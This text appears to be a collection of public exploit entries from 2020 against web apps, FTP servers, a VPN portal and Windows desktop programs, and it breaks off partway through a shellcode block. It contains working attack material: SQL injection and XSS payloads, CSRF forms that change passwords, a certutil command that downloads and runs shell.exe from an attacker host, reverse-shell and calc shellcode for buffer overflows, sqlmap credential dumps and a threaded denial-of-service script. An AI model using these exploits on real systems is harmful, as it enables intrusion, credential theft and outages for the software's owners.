
  1. # Exploit Title: Web Based Online Hotel Booking System 0.1.0 - Authentication Bypass # Date: 2020-07-03 # Exploit Author: KeopssGroup0day,Inc # Vendor Homepage: https://github.com/mrzulkarnine/Web-based-hotel-booking-system # Software Link: https://github.com/mrzulkarnine/Web-based-hotel- booking-system # Version: 0.1.0 # Tested on: Kali Linux Source code(localhost/admin/loginauth.php): <?php session_start(); $_SESSION['username'] = $_POST['username']; $_SESSION['password'] = $_POST['password']; include './auth.php'; $re = mysql_query("select * from user where username = '".$_SESSION['username']."' AND password = '".$_SESSION['password']."' " ); echo mysql_error(); if(mysql_num_rows($re) > 0) { header('Refresh: 0;url=dashboard.php'); } else { session_destroy(); header("location: index.htm"); } ?> Payload: Username: 1' or 1 = 1 LIMIT 1# Password: 1' or 1 = 1 LIMIT 1#
  2. # Exploit Title: Online Polling System 1.0 - Authentication Bypass # Date: 2020-07-20 # Author: AppleBois # Version: NULL # Software Link: https://www.sourcecodester.com/php/14330/online-polling-system.html # # Administration Control Panel || Authentication Bypass # Unthenticated User perform SQL Injection bypass login mechanism on /admin/checklogin.php # ###################################################################################### #Vulnerable Code # #$myusername=$_POST['myusername']; #$mypassword=$_POST['mypassword']; #$encrypted_mypassword=md5($mypassword); # #$result=mysqli_query($conn, "SELECT * FROM `tbadministrators` WHERE email='$myusername' and password='$encrypted_mypassword'"); # #$count=mysqli_num_rows($result); # #if($count==1){ # #$user = mysqli_fetch_assoc($result); #$_SESSION['member_id'] = $user['member_id']; #header("location:student.php"); #} # ###################################################################################### POST /admin/checklogin.php HTTP/1.1 Host: 10.10.10.2:81 Content-Length: 53 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://10.10.10.2:81 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://10.10.10.2:81/online/index.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: ASP.NET_SessionId=vbrb31kd3s5hmz3uobg0smck; UserSettings=language=1; dnn_IsMobile=False; .ASPXANONYMOUS=VA9hDh-1Ldg0FPbBfd9HAWSTqKjasYcZMlHQnpPaoR5WQipK7Q_kKnAlAqfWp0WgtO8HXH2_Tsrhfh-Z7137cng_MeEp3aiMPswVEPZc-UOdZQTp0; __RequestVerificationToken_L0ROTg2=Js5PUWl0BiY3kJLdEPU2oEna_UsEFTrNQiGY986uBwWdRyVDxr2ItTPSUBd07QX6rRyfXQ2; USERNAME_CHANGED=; language=en-US; authentication=DNN; 
.DOTNETNUKE=CC547735526446773F995D833FACDA646745AE4409516EBF345F1AC725F7D7CE7BFC420BF5EFE9FE2AEC92B04C89CCD2E64C34BA4E195D7D8D6EED7892574DB3FF02599F; ICMSSESSION=mgnp26oubn7hfc590q6j5c9o70; PHPSESSID=1gpgmmltf6uk3ju3aakgd0s8m5 Connection: close myusername=' or 1=1#&mypassword=ad&Submit=Login
  3. # Exploit Title: Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting # Date: 2020-06-29 # Exploit Author: KeopssGroup0day,Inc # Vendor Homepage: https://www.sourcecodester.com/php/14198/online-farm-management-system-phpmysql.html # Software Link: https://www.campcodes.com/projects/php/249/farm-management-system-in-php-mysql/ # Version: 0.1.0 # Tested on: Kali Linux Source code(review.php): <?php if($result) : while($row1 = $result->fetch_array()) : ?> <div class="con"> <div class="row"> <div class="col-sm-4"> <em style="color: black;"><?= $row1['comment']; ?></em> </div> POC: 1. http://192.168.1.58/a/review.php?pid=31 go 2. We send the payload (<script>alert(1)</script>) 3. Write a review payload and submit 4. And refresh the page
  4. # Exploit Title: Wing FTP Server 6.3.8 - Remote Code Execution (Authenticated) # Date: 2020-06-26 # Exploit Author: v1n1v131r4 # Vendor Homepage: https://www.wftpserver.com/ # Software Link: https://www.wftpserver.com/download.htm # Version: 6.3.8 # Tested on: Windows 10 # CVE : -- Wing FTP Server have a web console based on Lua language. For authenticated users, this console can be exploited to obtaining a reverse shell. 1) Generate your payload (e.g. msfvenom) 2) Send and execute via POST POST /admin_lua_.html?r=0.3592753444724336 HTTP/1.1 Host: 192.168.56.105:5466 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.56.105:5466/admin_lua_term.html Content-Type: text/plain;charset=UTF-8 Content-Length: 153 Connection: close Cookie: admin_lang=english; admin_login_name=admin; UIDADMIN=75e5058fb61a81e427ae86f55794f1f5 command=os.execute('cmd.exe%20%2Fc%20certutil.exe%20-urlcache%20-split%20-f%20http%3A%2F%2F192.168.56.103%2Fshell.exe%20c%3A%5Cshell.exe%20%26shell.exe')
  5. # Exploit Title: Infor Storefront B2B 1.0 - 'usr_name' SQL Injection # Google Dork: inurl:storefrontb2bweb # Date: 2020-06-27 # Exploit Author: ratboy # Vendor Homepage: https://www.insitesoft.com/infor-storefront/ # Version: Infor Storefront # Tested on: Windows All Versions [POC Multiple Vulns] python sqlmap.py -u "http://localhost/storefrontB2BWEB/login.do?setup_principal=true&action=prepare_forgot&login=true&usr_name=ass" -p usr_name --dbms=mssql --level=5 --risk=3 --tamper=between,space2comment -o --random-agent --parse-errors --os-shell --technique=ES python sqlmap.py -u "http://localhost/storefrontB2CWEB/cart.do?action=cart_add&itm_id=1" -p itm_id --dbms=mssql --level=5 --risk=3 --tamper=between,space2comment -o --random-agent --parse-errors --os-shell --technique=ES or... http://localhost/storefrontB2BWEB/login.do?setup_principal=true&action=prepare_forgot&login=true&usr_name=ass'[SQL INJECTION];-- http://localhost/storefrontB2CWEB/cart.do?action=cart_add&itm_id=1'[SQL INJECTION];-- -- Sincerly, Aaron Schrom
  6. # Title: Sonar Qube 8.3.1 - 'SonarQube Service' Unquoted Service Path # Author: Velayutham Selvaraj # Date: 2020-06-03 # Vendor Homepage: https://www.sonarqube.org # Software Link: https://www.sonarqube.org/downloads/ # Version : 8.3.1 # Tested on: Windows 10 64bit(EN) About Unquoted Service Path : ============================== When a service is created whose executable path contains spaces and isn't enclosed within quotes, leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges. (only if the vulnerable service is running with SYSTEM privilege level which most of the time it is). Steps to recreate : ============================= 1. Open CMD and Check for USP vulnerability by typing [ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ ] 2. The Vulnerable Service would Show up. 3. Check the Service Permissions by typing [ sc qc SonarQube] 4. The command would return.. C:\Users\HP-840-G2-ELITEBOOK>sc qc SonarQube [SC] QueryServiceConfig SUCCESS SERVICE_NAME: SonarQube TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Users\HP-840-G2-ELITEBOOK\Downloads\sonarqube-8.3.1.34397\sonarqube-8.3.1.34397\bin\windows-x86-64\wrapper.exe -s C:\Users\HP-840-G2-ELITEBOOK\Downloads\sonarqube-8.3.1.34397\sonarqube-8.3.1.34397\conf\wrapper.conf LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : SonarQube DEPENDENCIES : SERVICE_START_NAME : LocalSystem 5. This concludes that the service is running as SYSTEM. "Highest privilege in a machine" 6. Now create a Payload with msfvenom or other tools and name it to wrapper.exe 7. Make sure you have write Permissions to where you downloaded. i kept it in downloads folders but confirmed it in program files as well. 8. 
Provided that you have right permissions, Drop the wrapper.exe executable you created into the "C:\Users\HP-840-G2-ELITEBOOK\Downloads\sonarqube-8.3.1.34397\sonarqube-8.3.1.34397\bin\windows-x86-64\" Directory. 9. Now restart the IObit Uninstaller service by giving coommand [ sc stop SonarQube] followed by [ sc start SonarQube] 10. If your payload is created with msfvenom, quickly migrate to a different process. [Any process since you have the SYSTEM Privilege]. During my testing : Payload : msfvenom -p windows/meterpreter/reverse_tcp -f exe -o wrapper.exe Migrate : meterpreter> run post/windows/manage/migrate [To migrate into a different Process ]
  7. # Exploit Title: Simple Startup Manager 1.17 - 'File' Local Buffer Overflow (PoC) # Exploit Author: PovlTekstTV # Date: 2020-07-15 # Vulnerable Software: Simple Startup Manager # Software Link Download: http://www.ashkon.com/download/startup-manager.exe # Version: 1.17 # Vulnerability Type: Local Buffer Overflow # Tested on: Windows 7 Ultimate Service Pack 1 (32 and 64 bit) # DEP and ASLR Disabled on system # Space for shellcode: 264 #!/usr/bin/python # Two sets of instructions are needed: # 1. JMP EDI # 2. JMP EBX # I found these in the OS-module: SETUPAPI.dll, which is usually protected using ASLR # The exploit will properly not work unless changed/bruteforced. # It is also possible to overwrite the SEH-handler with 600+ bytes, # however I did not find any POP, POP, RETs. # Walkthrough: # 1.- Run the python script, it will create a new file "exploit.txt" # 2.- Copy the content of the new file 'exploit.txt' to clipboard # 3.- Turn off DEP for startup-manger.exe # 4.- Open 'startup-manger.exe' # 5.- Click 'New' or go to 'File' and click 'New' # 6.- Paste content from clipboard into 'File' parameter # 7.- Click on 'OK' # 9.- Calc.exe runs. 
#Identified the following badchars: x00 x0a x09 x0c x0d x3a x5c #msfvenom -p windows/exec cmd=calc.exe -f c -b "\x00\x0a\x0c\x0d\x3a\x5c" shellcode = ("\xdb\xd0\xd9\x74\x24\xf4\xbe\xcb\xe3\xc2\xa5\x5a\x33\xc9\xb1" "\x31\x83\xc2\x04\x31\x72\x14\x03\x72\xdf\x01\x37\x59\x37\x47" "\xb8\xa2\xc7\x28\x30\x47\xf6\x68\x26\x03\xa8\x58\x2c\x41\x44" "\x12\x60\x72\xdf\x56\xad\x75\x68\xdc\x8b\xb8\x69\x4d\xef\xdb" "\xe9\x8c\x3c\x3c\xd0\x5e\x31\x3d\x15\x82\xb8\x6f\xce\xc8\x6f" "\x80\x7b\x84\xb3\x2b\x37\x08\xb4\xc8\x8f\x2b\x95\x5e\x84\x75" "\x35\x60\x49\x0e\x7c\x7a\x8e\x2b\x36\xf1\x64\xc7\xc9\xd3\xb5" "\x28\x65\x1a\x7a\xdb\x77\x5a\xbc\x04\x02\x92\xbf\xb9\x15\x61" "\xc2\x65\x93\x72\x64\xed\x03\x5f\x95\x22\xd5\x14\x99\x8f\x91" "\x73\xbd\x0e\x75\x08\xb9\x9b\x78\xdf\x48\xdf\x5e\xfb\x11\xbb" "\xff\x5a\xff\x6a\xff\xbd\xa0\xd3\xa5\xb6\x4c\x07\xd4\x94\x1a" "\xd6\x6a\xa3\x68\xd8\x74\xac\xdc\xb1\x45\x27\xb3\xc6\x59\xe2" "\xf0\x39\x10\xaf\x50\xd2\xfd\x25\xe1\xbf\xfd\x93\x25\xc6\x7d" "\x16\xd5\x3d\x9d\x53\xd0\x7a\x19\x8f\xa8\x13\xcc\xaf\x1f\x13" "\xc5\xd3\xfe\x87\x85\x3d\x65\x20\x2f\x42") payload = shellcode payload += ("A"*(268-len(payload)-4)) payload += ("\xe4\xa9\x4e\x76") #0x764ea9e4 (JMP EBX) {PAGE_READONLY} [SETUPAPI.dll] payload += ("\x5f\xbc\x4e\x76") #0x764ebc5f (JMP EDI) {PAGE_READONLY} [SETUPAPI.dll] #Write payload to file file = open("exploit.txt" , 'w') file.write(payload) file.close()
  8. # Exploit Title: CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password) # Date: 2020-05-31 # Exploit Author: Noth # Vendor Homepage: https://github.com/boiteasite/cmsuno # Software Link: https://github.com/boiteasite/cmsuno # Version: v1.6 # CVE : 2020-15600 An issue was discovered in CMSUno before 1.6.1. uno.php allows CSRF to change the admin password. PoC : <html> <body> <script>history.pushState(",",'/')</script> <form action=“http://127.0.0.1/cmsuno-master/uno.php”method=“POST”> <input type=“hidden” name=“user” value=“admin”/> <input type=“hidden” name=“pass” value=“yourpassword”/> <input type=“submit” name=“user” value=“Submit request”/> </form> </body> </html>
  9. # Exploit Title: NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter) # Date: 2019-06-28 # Exploit Author: Saeed reza Zamanian # Vendor Homepage: https://sourceforge.net/projects/netpclinker/ # Software Link: https://sourceforge.net/projects/netpclinker/files/ # Version: 1.0.0.0 # Tested on: Windows Vista SP1 #!/usr/bin/python ''' # Replicate Crash: 1) Install and Run the application 2) Go to second tab "Clients Control Panel" 3) Press Add button 4) Run the exploit , the exploit creates a text file named payload.txt 5) Copy payload.txt contents into the add client dialog , "DNS/IP" field 6) Press OK . Your shellcode will be executed by pressing OK button. ''' #msfvenom -p windows/exec CMD=calc -f c -b "\x00\x0a\x0d\x33\x35\x36" #Bad Characters : \x0a\x0d\x33\x35\x36 shellcode = ( "\xdb\xc4\xd9\x74\x24\xf4\x5b\xbe\x9a\x32\x43\xd2\x31\xc9\xb1" "\x30\x83\xc3\x04\x31\x73\x14\x03\x73\x8e\xd0\xb6\x2e\x46\x96" "\x39\xcf\x96\xf7\xb0\x2a\xa7\x37\xa6\x3f\x97\x87\xac\x12\x1b" "\x63\xe0\x86\xa8\x01\x2d\xa8\x19\xaf\x0b\x87\x9a\x9c\x68\x86" "\x18\xdf\xbc\x68\x21\x10\xb1\x69\x66\x4d\x38\x3b\x3f\x19\xef" "\xac\x34\x57\x2c\x46\x06\x79\x34\xbb\xde\x78\x15\x6a\x55\x23" "\xb5\x8c\xba\x5f\xfc\x96\xdf\x5a\xb6\x2d\x2b\x10\x49\xe4\x62" "\xd9\xe6\xc9\x4b\x28\xf6\x0e\x6b\xd3\x8d\x66\x88\x6e\x96\xbc" "\xf3\xb4\x13\x27\x53\x3e\x83\x83\x62\x93\x52\x47\x68\x58\x10" "\x0f\x6c\x5f\xf5\x3b\x88\xd4\xf8\xeb\x19\xae\xde\x2f\x42\x74" "\x7e\x69\x2e\xdb\x7f\x69\x91\x84\x25\xe1\x3f\xd0\x57\xa8\x55" "\x27\xe5\xd6\x1b\x27\xf5\xd8\x0b\x40\xc4\x53\xc4\x17\xd9\xb1" "\xa1\xe8\x93\x98\x83\x60\x7a\x49\x96\xec\x7d\xa7\xd4\x08\xfe" "\x42\xa4\xee\x1e\x27\xa1\xab\x98\xdb\xdb\xa4\x4c\xdc\x48\xc4" "\x44\xbf\x0f\x56\x04\x40" ) egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x65\x7a\x61\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" nSEH = '\xEB\xAA\x90\x90' #Jump Back # (Vista) # PPR(ecx) : 0x00494b67 : startnull,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [NPL.exe] # ASLR: 
False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.0 (C:\Program Files\NetPCLinker\NPL.exe) SEH = '\x67\x4b\x49' offset = "RezaReza"+shellcode +'\x41'*(1199-8-len(shellcode)-len(egghunter)-50) payload = offset+egghunter+"\x90"*50+nSEH+SEH try: f=open("payload.txt","w") print("[+] Creating %s bytes payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")
  10. # Exploit Title: WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection # Google Dork: inurl:/wp-content/themes/nexos/ # Date: 2020-06-17 # Exploit Author: Vlad Vector # Vendor: Sanljiljan [ https://themeforest.net/user/sanljiljan ] # Software Version: 1.7 # Software Link: https://themeforest.net/item/nexos-real-estate-agency-directory/21126242 # Tested on: Debian 10 # CVE: CVE-2020-15363, CVE-2020-15364 # CWE: CWE-79, CWE-89 ### [ Info: ] [i] The Nexos theme through 1.7 for WordPress allows side-map/?search_order= SQL Injection. ### [ Vulnerabilities: ] [x] Unauthenticated Reflected XSS [x] SQL Injection ### [ PoC Unauthenticated Reflected XSS: ] [!] TARGET/TARGET-DIR/top-map/?search_order=idlisting DESC&search_location="><img src=x onerror=alert(`VLΛDVΞCTOR`);window.location=`https://twitter.com/vlad_vector`%3E> [!] GET /TARGET-DIR/top-map/?search_order=idlisting%20DESC&search_location=%22%3E%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`);window.location=`https://twitter.com/vlad_vector`%3E%3E HTTP/1.1 Host: listing-themes.com ### [ PoC SQL Injection: ] [!] sqlmap --url="TARGET/TARGET-DIR/side-map/?search_order=idlisting%20DESC" -dbs --random-agent --threads 4 [02:23:33] [INFO] the back-end DBMS is MySQL [02:23:33] [INFO] fetching database names [02:23:33] [INFO] fetching number of databases [02:23:33] [INFO] resumed: 2 available databases [2]: [*] geniuscr_nexos [*] information_schema [!] sqlmap --url="TARGET/TARGET-DIR/side-map/?search_order=idlisting%20DESC" -D geniuscr_nexos -T wp_users -C user_login,user_pass,user_email --random-agent --threads 8 Database: TARGET-DB Table: wp_users [9 entries] +--------------+------------------------------------+-------------------------+
  11. # Exploit Title: Docsify.js 4.11.4 - Reflective Cross-Site Scripting # Date: 2020-06-22 # Exploit Author: Amin Sharifi # Vendor Homepage: https://docsify.js.org # Software Link: https://github.com/docsifyjs/docsify # Version: 4.11.4 # Tested on: Windows 10 # CVE : CVE-2020-7680 docsify.js uses fragment identifiers (parameters after # sign) to load resources from server-side .md files. it then renders the .md file inside the HTML page. For example : https://docsify.js.org/#/quickstart sends an ajax to https://docsify.js.org/quickstart.md and renders it inside the html page. due to lack of validation it is possible to provide external URLs after the /#/ and render arbitrary javascript/HTML inside the page which leads to DOM-based Cross Site Scripting (XSS). Steps to reproduce: step 1. setup a server (for example I use flask here, for the POC im hosting one on https://asharifi.pythonanywhere.com ) step 2. the server should respond to request to /README.md with a crafted XSS payload. here is the payload "Html Injection and XSS PoC</p><img src=1 onerror=alert(1)><img src=1 onerror=alert(document.cookie)><p>" also the CORS should be set so that other Origins would be able to send ajax requests to the server so Access-Control-Allow-Origin must be set to * (or to the specific domain that you wanna exploit) example code below: ------------------------------------------------- from flask import Flask import flask app = Flask(__name__) @app.route('/README.md') def inject(): resp = flask.Response("Html Injection and XSS PoC</p><img src=1 onerror=alert(1)><img src=1 onerror=alert(document.cookie)><p>") resp.headers['Access-Control-Allow-Origin'] = '*' return resp ------------------------------------------------------ step 3. 
craft the link that triggers the issue. For example, for the https://docsify.js.org website the link would be https://docsify.js.org/#//asharifi.pythonanywhere.com/README (note that the mentioned domain is no longer vulnerable at the time of writing this report). When a user visits this URL, an AJAX request is sent to asharifi.pythonanywhere.com/README.md and the response is rendered inside the web page, which results in the XSS payload being executed on the page. snyk advisory: https://snyk.io/vuln/SNYK-JS-DOCSIFY-567099 Mitre CVE entry: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7680
  12. # Exploit Title: Sophos VPN Web Panel 2020 - Denial of Service (Poc) # Date: 2020-06-17 # Exploit Author: Berk KIRAS # Vendor Homepage: https://www.sophos.com/ # Version:2020 Web Panel # Tested on: Apache # Berk KIRAS PwC - Cyber Security Specialist # Sophos VPN Web Portal Denial of Service Vulnerability # System parse JSON data. If we want to send some JSON with invalid data format # for ex. valid -> {"test","test2"} , invalid -> {"test",PAYLOAD"test2"} # The system can not parse this data fastly and service down # payload_option2 ="../../../../../../../../../FILE./FILE" #!/usr/bin/python3 import requests import sys import random import threading def send_req(): cnt = random.randint(9,22) payload= "../"*cnt+'{FILE}' my_datas_params = {"username":"test", payload+"password":"admin", "cookie":"0", "submit":"<div class=\"login_screen_login_button_left\"></div><div class=\"login_screen_login_button_middle\">Oturum Aç</div><div class=\"login_screen_login_button_right\"></div>", "language":"turkish", "browser_id":"kbgacsyo-q4j5o7lr70e"} # You should change some values into the headers Host_addr = sys.argv[2] Origin=sys.argv[1]+"://"+sys.argv[2] Referrer=sys.argv[1]+"://"+sys.argv[2] Cookie=sys.argv[4] #Headers my_datas_headers ={ "Host":str(Host_addr), "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0", "Accept": "text/javascript, text/html, application/xml, text/xml, */*", "Accept-Language": "tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "X-Prototype-Version": "1.6.1_rc3", "Content-type": "application/json; charset=UTF-8", "Origin":Origin, "Connection": "close", "Referer":Referrer, "Cookie":Cookie, } my_datas_headers2 ={ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0", "Accept": "text/javascript, text/html, application/xml, text/xml, */*", "Accept-Language": "tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3", 
"Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "X-Prototype-Version": "1.6.1_rc3", "Content-type": "application/json; charset=UTF-8", "Connection": "close", } #If you want to edit and add headers some headers added s = requests.session() #if you want simple-> headers={'User-Agent': 'Mozilla', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive'} s.headers.update(my_datas_headers2) print(s.headers.items) r = s.post(sys.argv[1]+"://"+sys.argv[2]+sys.argv[3],data=my_datas_params) return s def main(): if(len(sys.argv) < 6): print("Usage:1) Implement your headers \n2)change payload if you want \n3) exploit.py <http/https> <domain> <page> <cookie-val> <Thread(1-10)> \nExample-> exploit.py http vpn.test.com /test/index.plx 2\nCoded by b3rkk1r4s | PwC Cyber") sys.exit(0) else: try: req_count=0 while(True): if(int(sys.argv[5])==1): resp = send_req() req_count=req_count+1 print("Sending Requests... Count: "+str(req_count)) else: threads = int(sys.argv[5]) jobs = [] for i in range(0, threads): out_list = list() thread = threading.Thread(target=send_req) jobs.append(thread) for j in jobs: j.start() print("Jobs Started!") # Ensure all of the threads have finished for j in jobs: j.join() except Exception: print(Exception) main()
  13. # Exploit Title: FTPDummy 4.80 - Local Buffer Overflow (SEH) # Date: 2020-07-22 # Author: Felipe Winsnes # Software Link: http://www.dummysoftware.com/ftpdummy.html # Version: 4.80 # Tested on: Windows 7 (x86) # Blog: https://whitecr0wz.github.io/ # Proof of Concept: # 1.- Run the python script, it will create the file "ftpdummypref3.dat". # 2.- Place the generated file into "C:\Program Files\FTPDummy!\". # 3.- Open the application. # 4.- Profit. import struct # msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread # Payload size: 448 bytes buf = b"" buf += b"\x89\xe0\xd9\xc5\xd9\x70\xf4\x5f\x57\x59\x49\x49\x49" buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x68\x68\x6e" buf += b"\x62\x53\x30\x53\x30\x67\x70\x35\x30\x6f\x79\x5a\x45" buf += b"\x34\x71\x4f\x30\x71\x74\x4e\x6b\x30\x50\x74\x70\x6c" buf += b"\x4b\x43\x62\x54\x4c\x4e\x6b\x56\x32\x67\x64\x4c\x4b" buf += b"\x32\x52\x36\x48\x74\x4f\x58\x37\x61\x5a\x35\x76\x30" buf += b"\x31\x69\x6f\x6c\x6c\x37\x4c\x35\x31\x31\x6c\x75\x52" buf += b"\x54\x6c\x57\x50\x39\x51\x48\x4f\x66\x6d\x56\x61\x7a" buf += b"\x67\x59\x72\x6c\x32\x52\x72\x63\x67\x4e\x6b\x62\x72" buf += b"\x32\x30\x4e\x6b\x73\x7a\x77\x4c\x6c\x4b\x52\x6c\x54" buf += b"\x51\x53\x48\x68\x63\x51\x58\x37\x71\x4b\x61\x72\x71" buf += b"\x4c\x4b\x32\x79\x61\x30\x47\x71\x5a\x73\x4c\x4b\x57" buf += b"\x39\x76\x78\x48\x63\x47\x4a\x67\x39\x6e\x6b\x50\x34" buf += b"\x6e\x6b\x43\x31\x4a\x76\x34\x71\x69\x6f\x6c\x6c\x49" buf += b"\x51\x6a\x6f\x54\x4d\x65\x51\x68\x47\x45\x68\x6b\x50" buf += b"\x63\x45\x6b\x46\x76\x63\x43\x4d\x6a\x58\x67\x4b\x43" buf += b"\x4d\x74\x64\x51\x65\x4a\x44\x42\x78\x6c\x4b\x76\x38" buf += b"\x56\x44\x53\x31\x6e\x33\x32\x46\x4c\x4b\x36\x6c\x72" buf += b"\x6b\x6c\x4b\x66\x38\x75\x4c\x53\x31\x4a\x73\x6e\x6b" buf += 
b"\x33\x34\x4c\x4b\x47\x71\x6e\x30\x4b\x39\x77\x34\x44" buf += b"\x64\x35\x74\x51\x4b\x63\x6b\x63\x51\x70\x59\x70\x5a" buf += b"\x76\x31\x69\x6f\x59\x70\x73\x6f\x53\x6f\x71\x4a\x4c" buf += b"\x4b\x46\x72\x38\x6b\x6e\x6d\x71\x4d\x50\x6a\x47\x71" buf += b"\x4e\x6d\x4f\x75\x4e\x52\x47\x70\x37\x70\x53\x30\x42" buf += b"\x70\x32\x48\x76\x51\x6e\x6b\x32\x4f\x4f\x77\x79\x6f" buf += b"\x5a\x75\x4f\x4b\x6b\x50\x47\x6d\x44\x6a\x57\x7a\x50" buf += b"\x68\x79\x36\x4e\x75\x6d\x6d\x6d\x4d\x6b\x4f\x49\x45" buf += b"\x57\x4c\x77\x76\x51\x6c\x74\x4a\x4b\x30\x49\x6b\x59" buf += b"\x70\x34\x35\x63\x35\x4d\x6b\x50\x47\x74\x53\x44\x32" buf += b"\x52\x4f\x31\x7a\x75\x50\x53\x63\x69\x6f\x38\x55\x42" buf += b"\x43\x61\x71\x72\x4c\x65\x33\x54\x6e\x61\x75\x70\x78" buf += b"\x50\x65\x73\x30\x41\x41" start = "\x41"* 8 start += "\x0d\x0a\x31\x0d\x0a" ending = "\x0d\x0a" end = "170.1.1.0" end += "\x0d\x0a" end += "\x22" end += "C:\Archivos2de2programa\FTPDummy!\FTPDummy!2418101EXE" end += "\x22" nseh = "\x70\x08\x71\x06" seh = struct.pack("<I", 0x0044D078) buffer = start + "A" * 477 + nseh + seh + "A" * 5 + buf + "\xff" * 2000 + ending + end try: f = open ("ftpdummypref3.dat", "w") f.write(buffer) f.close() print "[+] The file has been created successfully!" except: print "[!] There has been an error while creating the file."
  14. # Title: UBICOD Medivision Digital Signage 1.5.1 - Authorization Bypass # Date: 2020-07-23 # Author: LiquidWorm # Product web page: http://www.medivision.co.kr # CVE: N/A Vendor: UBICOD Co., Ltd. | MEDIVISION INC. Product web page: http://www.medivision.co.kr Affected version: Firmware 1.5.1 (2013.01.3) Summary: Medivision is a service that provides everything from DID operation to development of DID (Digital Information Display) optimized for hospital environment and production of professional contents, through DID product installation, image, video content planning, design work, and remote control. This is a one-stop solution that solves management at once. Desc: The application suffers from a privilege escalation vulnerability. Normal user can elevate his/her privileges by navigating to /html/user (via IDOR) page sending an HTTP GET request setting the parameter 'ft[grp]' to integer value '3' gaining super admin rights. Tested on: Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.22 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5575 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5575.php 19.06.2020 -- <html> <body> <form action="http://10.0.39.2/query/user/itSet" method="POST"> <input type="hidden" name="aa[_id]" value="157" /> <input type="hidden" name="aa[pass]" value="123456" /> <input type="hidden" name="od[]" value="name" /> <input type="hidden" name="ft[grp]" value="3" /> <input type="hidden" name="ip" value="0" /> <input type="hidden" name="np" value="13" /> <input type="submit" value="Submit request" /> </form> </body> </html>
  15. # Exploit Title: Snes9K 0.09z - 'Port Number' Buffer Overflow (SEH) # Date: 2020-07-20 # Exploit Author: MasterVlad # Vendor Homepage: https://sourceforge.net/projects/snes9k/ # Software Link: https://www.exploit-db.com/apps/ef5249b64ce34575c12970b334a08c17-snes9k009z.zip # Version: 0.09z # Vulnerability Type: Local Buffer Overflow # Tested on: Windows 10 x64 # Proof of Concept: # 1. Run the python script # 2. Open exploit.txt and copy the content to clipboard # 3. Open Snes9K 0.09z # 4. Click on Netplay -> Connect to Server # 5. Paste the clipboard into the "Port Number" field # 6. Click on Connect and then on OK #!/usr/bin/python # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d" -f py buf = "" buf += "\xd9\xc3\xbf\x7c\xdc\xed\x95\xd9\x74\x24\xf4\x58\x29" buf += "\xc9\xb1\x52\x31\x78\x17\x83\xc0\x04\x03\x04\xcf\x0f" buf += "\x60\x08\x07\x4d\x8b\xf0\xd8\x32\x05\x15\xe9\x72\x71" buf += "\x5e\x5a\x43\xf1\x32\x57\x28\x57\xa6\xec\x5c\x70\xc9" buf += "\x45\xea\xa6\xe4\x56\x47\x9a\x67\xd5\x9a\xcf\x47\xe4" buf += "\x54\x02\x86\x21\x88\xef\xda\xfa\xc6\x42\xca\x8f\x93" buf += "\x5e\x61\xc3\x32\xe7\x96\x94\x35\xc6\x09\xae\x6f\xc8" buf += "\xa8\x63\x04\x41\xb2\x60\x21\x1b\x49\x52\xdd\x9a\x9b" buf += "\xaa\x1e\x30\xe2\x02\xed\x48\x23\xa4\x0e\x3f\x5d\xd6" buf += "\xb3\x38\x9a\xa4\x6f\xcc\x38\x0e\xfb\x76\xe4\xae\x28" buf += "\xe0\x6f\xbc\x85\x66\x37\xa1\x18\xaa\x4c\xdd\x91\x4d" buf += "\x82\x57\xe1\x69\x06\x33\xb1\x10\x1f\x99\x14\x2c\x7f" buf += 